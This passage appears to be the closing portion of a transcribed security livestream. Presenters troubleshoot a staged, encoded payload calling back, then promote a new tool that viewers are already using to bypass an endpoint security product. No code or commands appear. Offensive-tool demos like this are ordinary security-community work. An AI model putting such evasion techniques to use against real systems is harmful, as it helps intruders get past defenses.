And right at the minute, it looks like it's sending over. I'm not sure if it is going to stay open. That says encoded stage. So it got the connection back, so it's pretty close. I wonder if it's because it's not actually leaving the process open. It's because it spawns a new process and then runs it from within there. So I'm betting it's probably because it's killing the process. So you'd have to find a way to spawn a new thread in the background, but I bet we could. Yeah, we won't troubleshoot now, but it's close. Yep.
Well, and that's enough off-roading and kind of on-the-fly tricks. But let's go ahead and wrap it up. Brian, thank you very much. And as I said, everyone, this is a new tool. Let's get out there, give it a shot. I see that we already have people that are giving it a shot right now and bypassing silence with it, which is good. But then go ahead and hit up the GitHub repository with any issues or requests that you guys have. And we really appreciate you guys coming and hanging out. Thanks again, Brian, and thank you so much, Bo, for hanging out.